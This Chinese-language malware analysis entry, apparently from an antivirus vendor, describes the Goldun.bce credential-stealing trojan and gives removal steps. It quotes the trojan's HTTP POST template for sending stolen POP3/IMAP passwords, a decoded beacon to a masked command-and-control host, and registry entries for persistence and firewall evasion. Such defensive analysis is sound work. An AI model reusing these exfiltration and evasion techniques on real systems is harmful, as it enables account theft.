Trojan.Spy.Win32.Goldun.bce蠕蟲病毒,該病毒為ecard病毒變種,連線網路後,獲取下載列表,下載病毒檔案等。盜取用戶“ftp”、“outlook”、 “Firefox”、“ICQ”、“MSN”、“AOL”和“YAHOO”等會員賬戶的登入賬號與登 陸密碼等信息,監聽“E-Gold”的加密連線,獲取用戶登入 信息;將竊取到的這些機密信息資料傳送到指定地址。
基本介紹
病毒標籤,病毒描述,行為分析,本地行為,網路行為,清除方案,
病毒標籤
病毒名稱: Trojan-Spy.Win32.Goldun.bce
病毒類型: 蠕蟲
檔案 MD5: 1FFCB1EA024C228ADE6D8DAD681C6ED7
公開範圍: 完全公開
危害等級: 4
:
感染系統: Windows98以上版本
開發工具: UPX 0.89.6 - 1.02 / 1.05 - 1.24 ->Markus & Laszlo
病毒描述
病毒運行後添加註冊表啟動項,衍生病毒檔案gzipmod.dll、vbagz.sys到%System32%目錄下,該病毒調用系統進程rundll32.exe,並將gzipmod.dll、vbagz.sys以句柄的形式注入其中,添加註冊表躲避系統自帶防火牆,創建病毒註冊表服務,病毒運行之後刪除自身檔案創造了互斥體防止病毒多次運行,病毒驅動通過 nt!ObReferenceObjectByName 打開磁碟驅動 DriverDisk,並遍歷該驅動創建的所有設備對象,該驅動記錄這些設備對象的地址用來隱藏病毒衍生的檔案,檢測路由器支持的路由協定功能、保護該病毒衍生的檔案不被查找、發現,連線網路隱藏打開地址,收集有關的電子郵件用戶端使用受影響的系統。
行為分析
本地行為
1、檔案運行後會釋放以下檔案
%system32%\gzipmod.dll
%system32%\vbagz.sys
2、添加註冊表項,創建病毒服務
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\
SharedAccess\Parameters\FirewallPolicy\StandardProfile\
AuthorizedApplications\List\C:\WINDOWS\system32\rundll32.exe
值: 字元串: "C:\WINDOWS\system32\rundll32.exe:*:Enabled:rundll32"
描述:添加註冊表躲避系統自帶防火牆
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\
Winlogon\Notify\gzipmod\DllName
值: 字元串: "gzipmod.dll."
描述:添加註冊表啟動項
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vbagz\DisplayName
值: 字元串: "VBA PnP Driver"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vbagz\ImagePath
值: 字元串: "system32\vbagz.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vbagz\Start
值: DWORD: 1 (0x1)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\vbagz\Type
值: DWORD: 1 (0x1)
描述:添加病毒服務
3、創建rundll32.exe進程將病毒DLL檔案注入到該進程中,創建病毒註冊表服務,病毒運行之後刪除自身檔案。
4、病毒驅動檔案通過 nt!ObReferenceObjectByName 打開磁碟驅動 DriverDisk,並遍歷該驅動創建的所有設備對象,該驅動記錄這些設備對象的地址用來在將來進行檔案隱藏操作時用,檢測路由器支持的路由協定功能、保護該病毒衍生的檔案不被查找、發現,創建以下驅動設備:
dprot
emulx86
fprot
itcoe
klite
ltppd
wlite
x86emul
xprot
5、一旦執行,DLL檔案試圖刪除該檔案如下(未實現):
%Documents and Settings%\所有用戶\開始選單\程式\啟動\newrnj.exe
6、創造了互斥體名為:“trmirmtx”,防止病毒多次運行。
7、收集有關的電子郵件信息(未實現):
1000B07E=mzipmod.1000B07E ASCII POST /%s?dt=0&id=%u HTTP/1.0
User-Agent: %s
Host: %s
Content-Length: %u
Content-Type: multipart/form-data; boundary=---------------------------71438020933
Connection: Keep-Alive
Pragma: no-cache
---------------
\n\n-----------------------------71438020933\n\nContent-Disposition: form-data; name="url"\n\n\n\n
\n\n-----------------------------71438020933\n\nContent-Disposition: form-data; name="stb"\n\n\n\n
\n\n-----------------------------71438020933\n\nContent-Disposition: form-data; name="frm"\n\n\n\n
\n\n-----------------------------71438020933\n\nContent-Disposition: form-data; name="cpn"\n\n\n\n
-----------------------------71438020933\n\nContent-Disposition: form-data; name="mydata"; filename="%u%u%s"\n\nContent-Type: application/octet-stream\n\n\n\n
POP3 Password2
POP3 Server
POP3 User Name
IMAP Password2
IMAP Server
IMAP User Name
網路行為
病毒運行後向195.93.219.***傳送GET信息:
GET os****.net/222/data.php?trackid=706172616D3D636D64266C616E673D2669643D32323232
267368656C6C3D3026736F636B73706F72743D36303532267665723D392668747470706F72743D3630
353126757074696D656D3D3426757074696D65683D30267569643D323844373032323632313 6463837443333 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 2600.xpsp.11894-27197)
Host: oslikinet
Connection: Keep-Alive
該連線已加密,解密後得到:
Os****.net/222/data.php?trackid=param=cmd&lang=&id=2222&shell=0&socksport
=6052&ver=9&httpport=6051&uptimem=4&uptimeh=0&uid=28D70226216F87D33
經分析此連線已失效
註:%System32%是一個可變路徑。病毒通過查詢作業系統來決定當前System資料夾的位置。
%Windir% WINDODWS所在目錄
%DriveLetter% 邏輯驅動器根目錄
%ProgramFiles% 系統程式默認安裝目錄
%HomeDrive% 當前啟動的系統的所在分區
%Documents and Settings% 當前用戶文檔根目錄
%Temp% \Documents and Settings
\當前用戶\Local Settings\Temp
%System32% 系統的 System32資料夾
Windows2000/NT中默認的安裝路徑是C:\Winnt\System32
windows95/98/me中默認的安裝路徑是%WINDOWS%\System
windowsXP中默認的安裝路徑是%system32%
清除方案
1、使用安天防線可徹底清除此病毒(推薦)。
2、手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(1)先打開Atool工具結束.rundll32.exe進程。
(2)使用Atool工具刪除病毒衍生的檔案
%system32%\gzipmod.dll
%system32%\vbagz.sys
(3)刪除病毒添加的註冊表項
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\
FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\system32\rundll32.exe
刪除List鍵下的鍵值C:\WINDOWS\system32\rundll32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\gzipmod\DllName
刪除Notify鍵下的gzipmod主鍵值
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
刪除Services鍵下vbagz主鍵值
